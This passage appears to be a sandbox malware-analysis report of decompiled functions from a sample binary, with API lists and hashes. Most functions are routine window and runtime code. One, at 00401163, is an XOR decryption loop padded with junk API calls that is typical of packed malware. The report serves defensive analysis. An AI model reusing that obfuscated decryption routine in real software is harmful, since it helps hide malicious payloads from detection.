				_t105 =  *((intOrPtr*)(_t129 + 0x94));
				_t136 = _t129 + 0x94;
				if( *((intOrPtr*)(_t129 + 0x94)) != 0) {
					E0041A92B(_t105);
				}
				E0041A92B( *((intOrPtr*)(_t129 + 0x98)));
				 *_t136 = 0;
				 *((intOrPtr*)(_t129 + 0x98)) = 0;
				goto L19;
			}

APIs

__EH_prolog.LIBCMT ref: 004266A4
lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 00426758
lstrcmpA.KERNEL32(?,00000000,?), ref: 00426776
lstrcmpA.KERNEL32(?,00000000,?,?), ref: 004267A4

Part of subcall function 0041A92B: GlobalFlags.KERNEL32(?), ref: 0041A935
Part of subcall function 0041A92B: GlobalUnlock.KERNEL32(?,?,?,0042421F,?,?,?,?,0040199F,00437BE8,?,004013A2), ref: 0041A94C
Part of subcall function 0041A92B: GlobalFree.KERNEL32 ref: 0041A957

GlobalLock.KERNEL32 ref: 004266CE

Part of subcall function 0041009E: __EH_prolog.LIBCMT ref: 004100A3

Part of subcall function 0041030E: PrintDlgA.COMDLG32(?,0042684E,00000001,0014000C,00000000,?,?,00000000), ref: 00410318

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Global$lstrcmp$H_prolog$FlagsFreeLockPrintUnlock
String ID:
API String ID: 2564375162-0
Opcode ID: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
Instruction ID: dab6b3ac01e2e209cde5cdaaba7fbabb505c74ae40abd7d4cd101a1c9b428fb9
Opcode Fuzzy Hash: 653e2c81b0d72e161c244adbd25edb8e30c70488008d71227ddbd14f21ca4b2e
Instruction Fuzzy Hash: E851A070B002269BCB14EF75D885FDAB7B8BF01308F41446EE559A3292DB38ED94CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040963B, Relevance: 7.6, APIs: 5, Instructions: 150
COMMON

Download Yara Rule

C-Code - Quality: 99%

			E0040963B() {
				void** _v8;
				struct _STARTUPINFOA _v76;
				signed int* _t48;
				signed int _t50;
				long _t55;
				signed int _t57;
				signed int _t58;
				int _t59;
				signed char _t63;
				signed int _t65;
				void** _t67;
				int _t68;
				int _t69;
				signed int* _t70;
				int _t72;
				intOrPtr* _t73;
				signed int* _t75;
				void* _t76;
				void* _t84;
				void* _t87;
				int _t88;
				signed int* _t89;
				void** _t90;
				signed int _t91;
				int* _t92;

				_t89 = E00405667(0x480);
				if(_t89 == 0) {
					E00406490(0x1b);
				}
				 *0x43b520 = _t89;
				 *0x43b620 = 0x20;
				_t1 =  &(_t89[0x120]); // 0x480
				_t48 = _t1;
				while(_t89 < _t48) {
					_t89[1] = _t89[1] & 0x00000000;
					 *_t89 =  *_t89 | 0xffffffff;
					_t89[2] = _t89[2] & 0x00000000;
					_t89[1] = 0xa;
					_t70 =  *0x43b520; // 0x22d48c0
					_t89 =  &(_t89[9]);
					_t48 =  &(_t70[0x120]);
				}
				GetStartupInfoA( &_v76);
				__eflags = _v76.cbReserved2;
				if(_v76.cbReserved2 == 0) {
					L25:
					_t72 = 0;
					__eflags = 0;
					do {
						_t75 =  *0x43b520; // 0x22d48c0
						_t50 = _t72 + _t72 * 8;
						__eflags = _t75[_t50] - 0xffffffff;
						_t90 =  &(_t75[_t50]);
						if(_t75[_t50] != 0xffffffff) {
							_t45 =  &(_t90[1]);
							 *_t45 = _t90[1] | 0x00000080;
							__eflags =  *_t45;
							goto L37;
						}
						__eflags = _t72;
						_t90[1] = 0x81;
						if(_t72 != 0) {
							asm("sbb eax, eax");
							_t55 =  ~(_t72 - 1) + 0xfffffff5;
							__eflags = _t55;
						} else {
							_t55 = 0xfffffff6;
						}
						_t87 = GetStdHandle(_t55);
						__eflags = _t87 - 0xffffffff;
						if(_t87 == 0xffffffff) {
							L33:
							_t90[1] = _t90[1] | 0x00000040;
						} else {
							_t57 = GetFileType(_t87);
							__eflags = _t57;
							if(_t57 == 0) {
								goto L33;
							}
							_t58 = _t57 & 0x000000ff;
							 *_t90 = _t87;
							__eflags = _t58 - 2;
							if(_t58 != 2) {
								__eflags = _t58 - 3;
								if(_t58 == 3) {
									_t90[1] = _t90[1] | 0x00000008;
								}
								goto L37;
							}
							goto L33;
						}
						L37:
						_t72 = _t72 + 1;
						__eflags = _t72 - 3;
					} while (_t72 < 3);
					return SetHandleCount( *0x43b620);
				}
				_t59 = _v76.lpReserved2;
				__eflags = _t59;
				if(_t59 == 0) {
					goto L25;
				}
				_t88 =  *_t59;
				_t73 = _t59 + 4;
				_v8 = _t73 + _t88;
				__eflags = _t88 - 0x800;
				if(_t88 >= 0x800) {
					_t88 = 0x800;
				}
				__eflags =  *0x43b620 - _t88; // 0x20
				if(__eflags >= 0) {
					L18:
					_t91 = 0;
					__eflags = _t88;
					if(_t88 <= 0) {
						goto L25;
					} else {
						goto L19;
					}
					do {
						L19:
						_t76 =  *_v8;
						__eflags = _t76 - 0xffffffff;
						if(_t76 == 0xffffffff) {
							goto L24;
						}
						_t63 =  *_t73;
						__eflags = _t63 & 0x00000001;
						if((_t63 & 0x00000001) == 0) {
							goto L24;
						}
						__eflags = _t63 & 0x00000008;
						if((_t63 & 0x00000008) != 0) {
							L23:
							_t65 = _t91 & 0x0000001f;
							__eflags = _t65;
							_t67 =  &(0x43b520[_t91 >> 5][_t65 + _t65 * 8]);
							 *_t67 =  *_v8;
							_t67[1] =  *_t73;
							goto L24;
						}
						_t68 = GetFileType(_t76);
						__eflags = _t68;
						if(_t68 == 0) {
							goto L24;
						}
						goto L23;
						L24:
						_v8 =  &(_v8[1]);
						_t91 = _t91 + 1;
						_t73 = _t73 + 1;
						__eflags = _t91 - _t88;
					} while (_t91 < _t88);
					goto L25;
				} else {
					_t92 = 0x43b524;
					while(1) {
						_t69 = E00405667(0x480);
						__eflags = _t69;
						if(_t69 == 0) {
							break;
						}
						 *0x43b620 =  *0x43b620 + 0x20;
						__eflags =  *0x43b620;
						 *_t92 = _t69;
						_t13 = _t69 + 0x480; // 0x480
						_t84 = _t13;
						while(1) {
							__eflags = _t69 - _t84;
							if(_t69 >= _t84) {
								break;
							}
							 *(_t69 + 4) =  *(_t69 + 4) & 0x00000000;
							 *_t69 =  *_t69 | 0xffffffff;
							 *(_t69 + 8) =  *(_t69 + 8) & 0x00000000;
							 *((char*)(_t69 + 5)) = 0xa;
							_t69 = _t69 + 0x24;
							_t84 =  *_t92 + 0x480;
						}
						_t92 =  &(_t92[1]);
						__eflags =  *0x43b620 - _t88; // 0x20
						if(__eflags < 0) {
							continue;
						}
						goto L18;
					}
					_t88 =  *0x43b620; // 0x20
					goto L18;
				}
			}

APIs

GetStartupInfoA.KERNEL32(?), ref: 00409699
GetFileType.KERNEL32(?,?,00000000), ref: 00409744
GetStdHandle.KERNEL32(-000000F6,?,00000000), ref: 004097A7
GetFileType.KERNEL32(00000000,?,00000000), ref: 004097B5
SetHandleCount.KERNEL32 ref: 004097EC

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: FileHandleType$CountInfoStartup
String ID:
API String ID: 1710529072-0
Opcode ID: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
Instruction ID: 8f3487591cd982a3eb9725f147ad5950e145dc92a1b9c359c43610153c7b6e5a
Opcode Fuzzy Hash: ecd1a007bcd950c4f6a802b73a84018a70199882e3a03b2a3ff8f6cc88cac146
Instruction Fuzzy Hash: F8510832514605CBD7208F38C884B7677E0EB05368F28467ED596EB3E2D7389C06C759

Uniqueness

Uniqueness Score: -1.00%

Function 0042722C, Relevance: 7.6, APIs: 5, Instructions: 127
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0042722C(void* __ecx, void* __edx, void* __eflags, signed int _a4) {
				intOrPtr _v8;
				char _v12;
				void* _v20;
				void* __ebp;
				intOrPtr* _t51;
				intOrPtr _t54;
				int _t58;
				signed int _t65;
				int _t77;
				void* _t79;
				signed int _t80;
				signed int _t82;
				signed int _t83;
				int _t84;
				void* _t88;
				int _t91;
				signed int _t100;
				signed int _t104;
				void* _t109;
				struct tagRECT* _t110;

				_t88 = __ecx;
				_t104 = _a4 + _a4 * 4 << 3;
				_t109 = _t104 +  *((intOrPtr*)(__ecx + 0x90));
				_t51 = E004271A8(__ecx, __edx, __eflags,  &_v20);
				_v12 =  *_t51;
				_v8 =  *((intOrPtr*)(_t51 + 4));
				_t91 =  *(_t109 + 0x24);
				_t100 = 0 |  *(_t109 + 0x20) - _t91 < 0x00000000;
				_t54 =  *((intOrPtr*)(__ecx + 0xec));
				if(_t54 == 0) {
					 *(_t109 + 0x18) =  *(_t109 + 0x20);
					 *(_t109 + 0x1c) =  *(_t109 + 0x24);
					L12:
					_v20 = MulDiv( *(_t109 + 0x10),  *(_t109 + 0x18),  *(_t109 + 0x1c));
					_t58 = MulDiv( *(_t109 + 0x14),  *(_t109 + 0x18),  *(_t109 + 0x1c));
					_t110 = _t104 +  *((intOrPtr*)(_t88 + 0x90));
					SetRect(_t110, 8, 8, _v20 + 0xb, _t58 + 0xb);
					if( *((intOrPtr*)(_t88 + 0xec)) != 0) {
						_push(0x42e4b0);
						_t65 = _t110->right - _t110->left + 0x10;
						__eflags = _t65;
						_push( &_v12);
						_push(_t110->bottom - _t110->top + 0x10);
						_push(_t65);
						_push(1);
						return E0041AE9C(_t88, _t65);
					}
					asm("cdq");
					asm("cdq");
					_t77 = OffsetRect(_t110, (_v12 - _t110->right - _t110->left - _t100 >> 1) - 1, (_v8 - _t110->bottom - _t110->top - _t100 >> 1) - 1);
					if(_a4 != 1) {
						return _t77;
					}
					return OffsetRect(_t110,  *(_t88 + 0xfc), 0);
				}
				_t79 = _t54 - 1;
				if(_t79 == 0) {
					__eflags = _t100;
					 *(_t109 + 0x1c) = _t91;
					_t80 =  *(_t109 + 0x20);
					if(_t100 == 0) {
						_t82 = _t80 + _t80 * 2 - _t91;
					} else {
						_t82 = _t80 + _t91;
						__eflags = _t82;
					}
					asm("cdq");
					_t83 = _t82 - _t100;
					__eflags = _t83;
					_t84 = _t83 >> 1;
					L9:
					 *(_t109 + 0x18) = _t84;
					goto L12;
				}
				if(_t79 != 1) {
					goto L12;
				}
				if(_t100 == 0) {
					 *(_t109 + 0x1c) = _t91;
					_t84 = ( *(_t109 + 0x20) << 1) -  *(_t109 + 0x24);
				} else {
					_t84 = 1;
					 *(_t109 + 0x1c) = _t84;
				}
				goto L9;
			}

APIs

MulDiv.KERNEL32(?,?,?), ref: 004272C4
MulDiv.KERNEL32(?,?,?), ref: 004272D6
SetRect.USER32 ref: 004272F4
OffsetRect.USER32(?,?,?), ref: 0042732D
OffsetRect.USER32(?,?,00000000), ref: 0042733E

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Rect$Offset
String ID:
API String ID: 3858320380-0
Opcode ID: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
Instruction ID: 9d4db4d92ebfce67b92012e8cfbb6e150ce2038beb84166a71d0e9c619fd8a43
Opcode Fuzzy Hash: a8bcfc7a24c1dd58891d067b0bfb63c54d62dd3b19c554575f39b6ca731ca03a
Instruction Fuzzy Hash: 15418871600A15DFD720CF68D944AAABBF6FB88300F484A2DE886D7655D734F805CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 0041AE9C, Relevance: 7.6, APIs: 5, Instructions: 118
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041AE9C(void* __ecx, void* __eflags) {
				struct tagPOINT* _t76;
				long* _t78;
				long* _t81;
				struct tagPOINT* _t82;
				signed int _t84;
				signed int _t85;
				signed int _t86;
				int _t87;
				struct tagPOINT* _t97;
				signed int _t108;
				void* _t123;
				void* _t125;

				E00406520(E0042A85C, _t125);
				_t123 = __ecx;
				_push(0);
				 *(_t125 - 0x10) =  *(__ecx + 0x40);
				 *(__ecx + 0x40) =  *(_t125 + 8);
				 *(__ecx + 0x44) =  *(_t125 + 0xc);
				 *(__ecx + 0x48) =  *(_t125 + 0x10);
				E0041A41D(_t125 - 0x24, __eflags);
				 *(_t125 - 4) =  *(_t125 - 4) & 0x00000000;
				E00419E91(_t125 - 0x24,  *(__ecx + 0x40));
				_t76 = __ecx + 0x4c;
				_t76->x =  *(__ecx + 0x44);
				_t76->y =  *(__ecx + 0x48);
				LPtoDP( *(_t125 - 0x1c), _t76, 1);
				_t78 =  *(_t125 + 0x14);
				_t97 = __ecx + 0x54;
				_t97->x =  *_t78;
				_t97->y = _t78[1];
				LPtoDP( *(_t125 - 0x1c), _t97, 1);
				_t81 =  *(_t125 + 0x18);
				_t82 = __ecx + 0x5c;
				_t82->x =  *_t81;
				_t82->y = _t81[1];
				LPtoDP( *(_t125 - 0x1c), _t82, 1);
				_t84 =  *(__ecx + 0x50);
				if(_t84 < 0) {
					 *(__ecx + 0x50) =  ~_t84;
				}
				_t85 =  *(_t123 + 0x58);
				if(_t85 < 0) {
					 *(_t123 + 0x58) =  ~_t85;
				}
				_t86 =  *(_t123 + 0x60);
				if(_t86 < 0) {
					 *(_t123 + 0x60) =  ~_t86;
				}
				 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
				_t87 = E0041A48F(_t125 - 0x24);
				_t108 = 0xa;
				if(_t97->x == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x4c) / _t108;
					_t97->x = _t87;
				}
				if( *(_t123 + 0x58) == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x50) / _t108;
					 *(_t123 + 0x58) = _t87;
				}
				if( *(_t123 + 0x5c) == 0) {
					asm("cdq");
					_t87 = _t97->x / _t108;
					 *(_t123 + 0x5c) = _t87;
				}
				if( *(_t123 + 0x60) == 0) {
					asm("cdq");
					_t87 =  *(_t123 + 0x58) / _t108;
					 *(_t123 + 0x60) = _t87;
				}
				if( *(_t123 + 0x1c) != 0) {
					E0041B2F1(_t123);
					_t87 =  *(_t125 - 0x10);
					if(_t87 !=  *((intOrPtr*)(_t123 + 0x40))) {
						_t87 = InvalidateRect( *(_t123 + 0x1c), 0, 1);
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
				return _t87;
			}

APIs

__EH_prolog.LIBCMT ref: 0041AEA1

Part of subcall function 0041A41D: __EH_prolog.LIBCMT ref: 0041A422
Part of subcall function 0041A41D: GetWindowDC.USER32(?,?,?,0041AED0,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0041A44B

Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EAA
Part of subcall function 00419E91: SetMapMode.GDI32(?,?), ref: 00419EB8

LPtoDP.GDI32(?,?,00000001), ref: 0041AEF9
LPtoDP.GDI32(?,?,00000001), ref: 0041AF11
LPtoDP.GDI32(?,?,00000001), ref: 0041AF29
InvalidateRect.USER32(?,00000000,00000001), ref: 0041AFB7

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: H_prologMode$InvalidateRectWindow
String ID:
API String ID: 2422810626-0
Opcode ID: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
Instruction ID: ea718bac83f46552081215f01c1c436204e2ca2be48b4d518ea9ba6a6dc7aab3
Opcode Fuzzy Hash: 833de7a5b383fbafa19164f96b33c5ca989ee9024f938b107583b44dd389414c
Instruction Fuzzy Hash: 904104B0601B159FCB20DF6AC880A9AB7F5FF48304F10482EE946D7790D7B5E855CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00401163, Relevance: 7.6, APIs: 6, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00401163(intOrPtr _a4, intOrPtr _a8, char* _a12) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				char _t49;
				intOrPtr _t58;
				intOrPtr _t90;
				intOrPtr _t107;
				void* _t115;

				_v8 =  *_a12;
				_v12 =  *((intOrPtr*)(_a12 + 1));
				_v16 = 0;
				while(_v16 < _a8) {
					asm("cdq");
					_v8 = ((_v8 & 0x000000ff) + 1) % 0x362;
					asm("cdq");
					_v12 = (0 + (_v12 & 0x000000ff)) % 0x362;
					_t58 =  *0x437cc0; // 0x2071c90
					_t107 =  *0x437cc0; // 0x2071c90
					E0040129C(_v8 & 0x000000ff, _t107 + (_v8 & 0x000000ff), _t58 + (_v12 & 0x000000ff));
					_t115 = _t115 + 8;
					asm("cdq");
					_v20 = 0;
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					GetLastError();
					_t90 =  *0x437cc0; // 0x2071c90
					 *(_a4 + _v16) =  *(_a4 + _v16) ^  *(_t90 + (_v20 & 0x000000ff));
					_v16 = _v16 + 1;
				}
				_t49 = _v8;
				 *_a12 = _t49;
				 *((char*)(_a12 + 1)) = _v12;
				return _t49;
			}

APIs

GetLastError.KERNEL32 ref: 0040123B
GetLastError.KERNEL32 ref: 00401241
GetLastError.KERNEL32 ref: 00401247
GetLastError.KERNEL32 ref: 0040124D
GetLastError.KERNEL32 ref: 00401253
GetLastError.KERNEL32 ref: 00401259

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
Instruction ID: 50b4629dd769d307c311c64c04c265a3d6c1846e1b25a8a03c552174e884fb50
Opcode Fuzzy Hash: 2fb4c9c442cb0e0720c7f3357a9b25f75bd02d34cfc46486d38f63fe239aacba
Instruction Fuzzy Hash: 3031E535A0928A9FCB05CF58CC917BDBF72BF89300F1880F8D4519B352C535AA51DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00415DE6, Relevance: 7.6, APIs: 5, Instructions: 91
windowCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00415DE6(void* __ebx, intOrPtr __ecx, void* __eflags) {
				void* _t31;
				signed int _t42;
				struct HWND__* _t62;
				void* _t64;

				E00406520(E00429E94, _t64);
				 *((intOrPtr*)(_t64 - 0x10)) = __ecx;
				E00412F9D(_t64 - 0x38);
				E0041331F(_t64 - 0x74);
				 *(_t64 - 4) = 0;
				_t62 = GetTopWindow( *(__ecx + 0x1c));
				if(_t62 != 0) {
					do {
						 *(_t64 - 0x58) = _t62;
						 *(_t64 - 0x34) = GetDlgCtrlID(_t62) & 0x0000ffff;
						_push(_t62);
						 *((intOrPtr*)(_t64 - 0x24)) = _t64 - 0x74;
						if(E00413767() == 0 || E00412DF9(_t35, 0, 0xbd11ffff, _t64 - 0x38, 0) == 0) {
							if(E00412DF9( *((intOrPtr*)(_t64 - 0x10)),  *(_t64 - 0x34), 0xffffffff, _t64 - 0x38, 0) == 0) {
								_t46 =  *((intOrPtr*)(_t64 + 0xc));
								if( *((intOrPtr*)(_t64 + 0xc)) != 0) {
									if((SendMessageA( *(_t64 - 0x58), 0x87, 0, 0) & 0x00000020) == 0) {
										L11:
										_t46 = 0;
									} else {
										_t42 = E00416528(_t64 - 0x74) & 0x0000000f;
										if(_t42 == 3 || _t42 == 6 || _t42 == 7 || _t42 == 9) {
											goto L11;
										}
									}
								}
								E00413162(_t64 - 0x38,  *((intOrPtr*)(_t64 + 8)), _t46);
							}
						}
						_t62 = GetWindow(_t62, 2);
					} while (_t62 != 0);
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				 *(_t64 - 0x58) = 0;
				_t31 = E00413DB2(_t64 - 0x74);
				 *[fs:0x0] =  *((intOrPtr*)(_t64 - 0xc));
				return _t31;
			}

APIs

__EH_prolog.LIBCMT ref: 00415DEB
GetTopWindow.USER32(?), ref: 00415E12
GetDlgCtrlID.USER32 ref: 00415E27
SendMessageA.USER32(?,00000087,00000000,00000000), ref: 00415E80
GetWindow.USER32(00000000,00000002), ref: 00415EBB

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$CtrlH_prologMessageSend
String ID:
API String ID: 4125289812-0
Opcode ID: eddda41c1041d001e68a3ff9ed0eca5f426747ef9a7cc5a696e2efd6d8ecddce
Instruction ID: a7ff307ea5fd4ed9b42493fc3e47649cc0ac06b73cf1fa4f536db176ac1b2ba5
Opcode Fuzzy Hash: eddda41c1041d001e68a3ff9ed0eca5f426747ef9a7cc5a696e2efd6d8ecddce
Instruction Fuzzy Hash: 5331A272D00614EACB21EBA5DC859EFBB74EF95304F60022BF411E2295E7784E81CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004105C2, Relevance: 7.6, APIs: 5, Instructions: 88
windowCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E004105C2(intOrPtr __ecx) {
				void* __esi;
				struct HWND__* _t40;
				void* _t42;
				void* _t50;
				intOrPtr _t63;
				signed int _t66;
				void* _t83;

				_t63 = __ecx;
				E00406520(E0042A8D0, _t83);
				_push(__ecx);
				_push(__ecx);
				 *(_t83 - 0x10) =  *(_t83 - 0x10) & 0x00000000;
				 *((intOrPtr*)(_t83 - 0x14)) = __ecx;
				if(( *(__ecx + 0x92) & 0x00000008) == 0) {
					L9:
					E00416B16( *((intOrPtr*)(_t83 + 8)), _t83,  *((intOrPtr*)(_t63 + 0x78)));
				} else {
					_t40 =  *(__ecx + 0x1c);
					if(_t40 == 0) {
						goto L9;
					} else {
						_t66 =  *0x436980; // 0x436994
						 *(_t83 - 0x10) = _t66;
						 *(_t83 - 4) =  *(_t83 - 4) & 0x00000000;
						_t42 = E00413740(_t83, GetParent(_t40));
						if(SendMessageA( *(_t42 + 0x1c), 0x464, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
							E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
						} else {
							E00416A77(_t83 - 0x10, 0x104);
						}
						if( *((intOrPtr*)( *(_t83 - 0x10) - 8)) == 0) {
							L8:
							 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
							E00416AEC(_t83 - 0x10);
							_t63 =  *((intOrPtr*)(_t83 - 0x14));
							goto L9;
						} else {
							_t50 = E00413740(_t83, GetParent( *( *((intOrPtr*)(_t83 - 0x14)) + 0x1c)));
							if(SendMessageA( *(_t50 + 0x1c), 0x465, 0x104, E00416CC1(_t83 - 0x10, _t83, 0x104)) >= 0) {
								E00416D10(_t83 - 0x10, __eflags, 0xffffffff);
								E00416861( *((intOrPtr*)(_t83 + 8)), _t83 - 0x10);
								 *(_t83 - 4) =  *(_t83 - 4) | 0xffffffff;
								E00416AEC(_t83 - 0x10);
							} else {
								E00416A77(_t83 - 0x10, 0x104);
								goto L8;
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0xc));
				return  *((intOrPtr*)(_t83 + 8));
			}

APIs

__EH_prolog.LIBCMT ref: 004105C7
GetParent.USER32(?), ref: 00410604
SendMessageA.USER32(?,00000464,00000104,00000000), ref: 0041062C
GetParent.USER32(?), ref: 00410655
SendMessageA.USER32(?,00000465,00000104,00000000), ref: 00410672

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: MessageParentSend$H_prolog
String ID:
API String ID: 1056721960-0
Opcode ID: 612438848c30a4d30a5efd75428cd7e7014c67747928bacea5f91ea9e0d91145
Instruction ID: 07ce01a875e9ee4c694f432b72042445b87f7b3637ebdeb0f8d3e1dd1834bd9a
Opcode Fuzzy Hash: 612438848c30a4d30a5efd75428cd7e7014c67747928bacea5f91ea9e0d91145
Instruction Fuzzy Hash: 13318170600216ABCF14EFA1DC45AEFB774FF40358F11452AE421A71D1DB78D995CB58

Uniqueness

Uniqueness Score: -1.00%

Function 004150E7, Relevance: 7.6, APIs: 5, Instructions: 69
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E004150E7(void* __ecx, int _a4, int _a8, RECT* _a12, RECT* _a16) {
				struct tagRECT _v20;
				int _t21;
				struct HWND__* _t22;
				struct HWND__* _t41;
				void* _t42;
				intOrPtr* _t43;

				_t42 = __ecx;
				_t21 = IsWindowVisible( *(__ecx + 0x1c));
				if(_t21 != 0 || _a12 != _t21 || _a16 != _t21) {
					_t22 = ScrollWindow( *(_t42 + 0x1c), _a4, _a8, _a12, _a16);
				} else {
					_push(5);
					_push( *(_t42 + 0x1c));
					while(1) {
						_t22 = GetWindow();
						_t41 = _t22;
						if(_t41 == 0) {
							goto L7;
						}
						GetWindowRect(_t41,  &_v20);
						E0041A2F1(_t42,  &_v20);
						SetWindowPos(_t41, 0, _v20.left + _a4, _v20.top + _a8, 0, 0, 0x15);
						_push(2);
						_push(_t41);
					}
				}
				L7:
				_t43 =  *((intOrPtr*)(_t42 + 0x34));
				if(_t43 != 0 && _a12 == 0) {
					return  *((intOrPtr*)( *_t43 + 0x58))(_a4, _a8);
				}
				return _t22;
			}

APIs

IsWindowVisible.USER32(?), ref: 004150F5
GetWindow.USER32(?,00000005), ref: 00415114
GetWindowRect.USER32 ref: 00415121

Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A305
Part of subcall function 0041A2F1: ScreenToClient.USER32 ref: 0041A30E

SetWindowPos.USER32(00000000,00000000,?,?,00000000,00000000,00000015,?), ref: 0041514C
ScrollWindow.USER32 ref: 00415166

Memory Dump Source

Source File: 00000001.00000002.931298676.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.931291180.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931326409.000000000042B000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.931336737.0000000000436000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931343392.0000000000439000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.931348847.000000000043C000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_sort.jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID:
API String ID: 1714389229-0
